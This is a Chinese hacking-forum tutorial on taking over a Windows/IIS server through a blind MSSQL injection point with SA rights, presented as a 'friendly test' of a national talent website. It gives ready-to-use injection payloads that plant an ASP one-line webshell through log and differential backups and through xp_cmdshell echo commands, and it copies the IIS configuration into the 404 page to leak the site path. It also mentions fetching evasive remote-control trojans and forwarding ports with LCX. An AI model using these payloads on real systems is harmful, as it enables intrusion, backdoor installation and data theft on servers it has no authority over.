sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
$ s* a( ]5 _' Y' ^2 E  R* \7 T* K9 ~' {

; u8 W  j6 _5 }                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
  O* S! V" C+ P' h0 A
. b% y" b2 |0 {& U$ M! W                                                                 
                                                                 
                                                                  论坛： http://www.90team.net/



& ^  \6 I2 F* S6 U* R* [友情检测国家人才网
' ]+ B4 T0 ]/ e& n6 G, x/ G4 n
: k$ G7 B5 Q( {# Z- _0 ]% I. R
内容：MSSQL注入SA权限不显错模式下的入侵

1 z: i- ^# G4 R' s( |0 p
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。


* j. ?5 C& Z$ W2 F0 k5 M' {这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ T( ^, H; C( }! F& y
- x6 F# L8 V+ }% V5 x# t思路：

* U! [6 ?6 X2 a* M首先：

; M/ ~! c$ \& ?! u通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

# B/ g8 A7 [" {4 d8 J1.日志备份获得Webshell

2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。
+ I  ^: ^5 I2 O4 z: W- T4 k
  L! k7 t8 p6 L; G1 C5.直接下载LCX将服务器端口转发出来

* Y, u! a5 ?2 U6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
" k. `) ^$ S/ P: y. V7 ^
1 Z; I& I. U, g4 t/ N

6 u! c- \4 T) I/ s4 Q* K7 M0 ^/ W在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

我直接演示后面一个方法


分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL



2 l1 \7 z, z( s
◆日志备份：
5 [* u+ l; H; W: W3 ]' i  J+ `
6 ^0 J1 W* L/ E$ _+ E0 ]
1. 进行初始备份
. P$ ^0 i1 c2 s, s# E; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
2 x$ F: C+ S7 I. H5 ?
+ M6 j, j. Z8 ~- |$ S9 K0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ f! {" @/ e( z1 Q1 c  
* j; k5 n, k" H7 a) u2 ^/ H3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--



3 Z4 u: Q0 U5 V& O+ f◆数据库差异备份
0 d( E; F3 i% p9 i* \  f- R
（1. 进行差异备份准备工作
. J/ D2 q& D0 o) j! K" ~* B
- l9 O. \% ~7 Z+ U3 t;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
6 K9 x* Q0 Y5 L/ N$ M
& d0 h' S% R: `7 v/ a; r0 h8 `上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
- U2 |3 X1 x3 k
# d* A# o1 d7 @5 z1 F
% g3 t5 _7 Y; j% M（2. 将数据写入到数据库
! J3 j8 c' s) p2 [# H1 Z5 F;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0 o. L1 g2 f% w
/ b' t9 }, a8 Q' p; s) Q6 q, x* v: K0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件
! ]. y% z3 ?. y2 j% c- m
+ k6 Z% y+ Q9 h; `;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
1 y! w5 T, z0 _. l
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件



+ J( m8 z8 c; _; ]! y+ M用^转义字符来写ASP(一句话木马)文件的方法:   

5 E3 q! B, \9 r! A- w' b+ L% B1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
2 \3 U, |  C2 X0 ]8 p) z, I
- C6 D+ \' ?/ I* u3 ]" f2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
- j- J" a( S" a
  n0 A; J6 [7 P读取IIS配置信息获取web路径

% Z. d/ s+ N. K     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

  p" f, i# P( a' c% F, |" ^执行命令
% k9 _3 w9 P. h& b" b' U  P6 k     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
, }  o: z# N1 F. U2 p5 q
7 o+ D/ ?' s) G6 _9 [; \; e1 S




; n" o' I* |, T. y  L

  {8 x) N$ G3 i! f7 F# {+ w
) ^# U& d' N8 d0 z

5 S8 Z  Q- Y9 n1 a

; R5 o- A( `9 P) D) q: d  P
7 I; Z9 e5 Z& O$ }1 Q, i/ [



# P6 D7 u5 w, P3 t4 p3 ^

- V& G8 F0 p! y4 \. S1 F6 T6 d

  Q& g* T4 W. F! O

/ O5 i; A) K6 {  f5 F
: ?( ]$ n6 j1 d1 N, @




/ a. A" v: G' e! a' x$ J



5 G) E7 [; S( N& ]9 b
# N7 f+ f8 _3 S4 V: V
: {, L1 E$ p4 y: g. q, o
& M1 W( D( e' I/ c* g
6 J0 ^! m) |+ q1 a; e1 h. C6 y9 v
' p6 f4 J; E9 s' G



+ C1 v+ h, R# f. i1 z% O


0 O4 }7 w* v/ a" M, u
7 r+ G/ h, H, R9 c  y! Y! Y1 a# C! P
" N& P8 d9 d* _, ?